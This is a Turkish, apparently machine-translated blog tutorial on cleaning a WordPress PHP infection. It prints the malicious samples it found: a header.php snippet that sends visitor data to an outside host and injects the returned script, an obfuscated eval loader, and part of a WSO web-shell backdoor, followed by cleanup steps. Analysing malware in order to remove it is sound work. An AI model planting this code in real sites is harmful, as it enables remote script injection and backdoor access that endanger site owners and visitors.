WordPress PHP virüsünü kaldırın

WordPress PHP virüsünü kaldırın

Güncelleme
0

Bu öğretici, bir WordPress blogunun virüs olduğu belirli bir durum sunar. WordPress PHP virüsünü kaldırın.

Geçen günler, WordPress için bir PHP virüsü gibi görünen şüpheli bir kod fark ettim. Aşağıdaki PHP kodu mevcuttu header.phpÇizgiden önce </head>.

<?php $wp_rssh = 'http'; $wp_gt = 'web'; error_reporting(0); ini_set('display_errors',0); $wp_uagent = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Firefox|MSIE/i', $wp_uagent) && preg_match ('/ NT/i', $wp_uagent))){
$wp_gturl=$wp_rssh."://".$wp_gt.$wp_rssh."s.com/".$wp_gt."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_uagent);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_gturl);
curl_setopt ($ch, CURLOPT_TIMEOUT, 10); $wp_cntnt = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_cntnt,1,3) === 'scr' ){ echo $wp_cntnt; } ?>

Bu, gösterildiği gibi, harici bir sunucudaki bir kaynağın içeriğini kurtarmaya çalışan bir PHP kodudur, ancak URL'ye atıfta bulunan kısım eksiktir.

Çalışma mekanizması biraz daha karmaşıktır ve bu WordPress PHP'yi etkilenen bölgelere ziyaret edenler için görünmez virüs haline getirir. Bunun yerine, arama motorlarını (Google) hedefler ve etkilenen web sitelerindeki ziyaretçi sayısında önemli bir azalmaya yol açar.

Kötü amaçlı WordPress PHP kötü amaçlı yazılım ayrıntıları

1. Yukarıdaki kod mevcuttur header.php.

2. Sunucuda bir dosya göründü wp-log.php klasörde wp-includes.

3. wp-log.php Şifreli bir kod içerir, ancak şifresini çözmek nispeten kolaydır.

<?php eval(gzinflate(base64_decode('7b1rd../Fw=='))) ?>

Kötü amaçlı yazılım kodunu defipting wp-log.php :

<?php
$auth_pass = "md5password";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
#+Dump Columns ////Boolean
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler" );
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}

@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.5');

if(get_magic_quotes_gpc()) {
    function WSOstripslashes($array) {
        return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
    }
    $_POST = WSOstripslashes($_POST);
    $_COOKIE = WSOstripslashes($_COOKIE);
}

function wsoLogin() {
    die("
<pre align=center-->

<form method="post"><input name="pass" type="password" /><input type="submit" value="" /></form>" );
}

function WSOsetcookie($k, $v) {
$_COOKIE[$k] = $v;
setcookie($k, $v);
}

if(!empty($auth_pass)) {
if(isset($_POST['pass']) &amp;&amp; (md5($_POST['pass']) == $auth_pass))
WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);

if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
wsoLogin();
}

if(strtolower(substr(PHP_OS,0,3)) == "win" )
$os = 'win';
else
$os = 'nix';

$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
error_reporting(0);

$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if(isset($_POST['c']))
@chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
$home_cwd = str_replace("\\", "/", $home_cwd);
$cwd = str_replace("\\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != '/')
$cwd .= '/';
?>

Bir sunucudaki dosya ve dizinlerdeki kimlik doğrulamasını ve işlemleri yönetmek için kod içeren bir PHP kötü amaçlı yazılım komut dosyası gibi görünüyor. Bu komut dosyası gibi değişkenler içerdiği çok kolay görülebilir. $auth_pass (kimlik doğrulama şifresi), $default_action (varsayılan eylem), $default_use_ajax (Ajax'ın varsayılan kullanımı) ve $default_charset (Varsayılan karakter ayarı).

Açıkçası, bu komut dosyası, arama motorları gibi belirli web robotlarına erişimi engellemek için HTTP kullanıcı aracılarını kontrol eden bir bölüme sahiptir. Ayrıca PHP güvenlik modunu kontrol eden ve belirli çalışma direktörlerini ayarlayan bir bölüme sahiptir.

4. Tarayıcıda wp-log.php'ye erişiliyorsa, bir alanla bir web sayfası görünür. kimlik doğrulama. İlk bakışta, yeni dosyaların hedef sunucuya kolayca tırmanabileceği bir dosya yöneticisi gibi görünüyor.

Cum devirusezi un web sitesi wordpress?

Her zaman, manuel bozukluk süreci önce keşfedilmeyi ve anlamayı, güvenlik açığını neyin anlamayı içerir.

1. Web sitesi için bir yedekleme oluşturur. Hem dosyaları hem de veritabanı içermelidir.

2. Virüsün ne kadar süre göründüğünü belirleyin ve web sunucusunda yaklaşık zamanda oluşturulan değiştirilmiş veya yeni dosyaları araştırın.

Örneğin, dosyaları görmek istiyorsanız .php Geçen hafta oluşturulan veya değiştirilen, sunucudaki komutu yürütün: 

find /your/web/path -type f -mtime -7 -exec ls -l {} \; | grep "\.php$"

WordPress dosyalarını ve kötü amaçlı yazılımları içeren dosyaları indirebileceğiniz basit bir yöntemdir.

3. Dosyayı kontrol edin .htaccess şüpheli direktifler. Komut Dosyası İzni veya Yürütme Hatları.

4. Veritabanını kontrol edin. Bazı WordPress yayınlarının ve sayfalarının kötü amaçlı yazılımlarla düzenlenmesi veya yeni eklemesi çok mümkündür Yöneticinin rolü olan kullanıcılar.

5. Klasörler ve dosyalar için yazma izinlerini kontrol edin. chmod Ve chown.

Önerilen izinler: Dosya için 644 ve yönetmenler için 755.

find /web/root/public/ -type f -exec chmod 644 {} \;
find /web/root/public/ -type d -exec chmod 755 {} \;

6. Tümünü güncelle WordPress Plugins / WordPress Themes.

İlgili: Düzeltme WordPress Hack 2023 (Virüs Yönlendirme)

Bunlar yöntemler “temel” Bir web sitesi / WordPress blogunu reddedebilirsiniz. Sorunlarınız varsa ve yardıma ihtiyacınız varsa, yorum kutusu açıktır.

Teknoloji konusunda tutkulu, 2006'dan başlayarak StealthSetts.com'da zevkle yazıyorum. İşletim sistemlerinde zengin bir deneyime sahibim: macOS, Windows ve Linux, aynı zamanda programlama dilleri ve bloglama platformlarında (WordPress) ve çevrimiçi mağazalar için (WooCommerce, Magento, Presashop).

Benim tarafımdan yazılmış öğreticiler.
Antivirüs & Güvenlik Öğreticiler ve BT haberleri WordPress
WordPress Kötü Yazılımları Kaldır WordPress Virüsünü Kaldır WordPress WordPress htaccess virüsü WordPress eklentisi virüsü WordPress virüsü WordPress Virüs Temaları
Ev BT öğreticileri, faydalı ipuçları ve haberler. WordPress PHP virüsünü kaldırın

ModSecurity (Mod_Security) Sil veya Kaldır

Opera 12.02'yi indirin – Güvenlik ve Performans

Yorum bırak

Gizli Ayarlar

Pencere

Windows 11

Windows 10

Windows 8 / 8.1

Windows 7

Windows Vista

Windows XP

Görev yöneticisi

Nasıl yapılır

Microsoft 365 / Office

Microsoft 365 / Office

Mükemmel olmak

Kelime

Powerpoint

Görünüm

Office 365 Verimliliği

Linux & Web Yazılımı

Nginx

Apache HTTP Sunucusu

PHP

SQL / MySQL

Centos

Ubuntu

Web Hosting

WordPress & Woocommerce

Güvenlik & Antivirüs

Farkındalık

IP'imi göster

Antivirüs & Güvenlik

Kötü amaçlı yazılım

Casus yazılım

© 2025 Gizli Ayarlar. BT alanında öğreticiler ve haberler.

Gizlilik Politikası | Çerezler hakkında | Temas etmek | Hakkımızda

RomânăEnglishFrançaisDeutschItalianoEspañolPortuguês日本語한국어Bahasa IndonesiaNorskNederlandsPolskiDanskSuomiSvenskaHrvatskiČeštinaБългарскиSlovenčinaSlovenščinaEesti keelLatviešu valodaLietuvių kalbaΕλληνικάУкраїнська中文(简体)РусскийTürkçeTiếng Việtעבריתภาษาไทยالعربية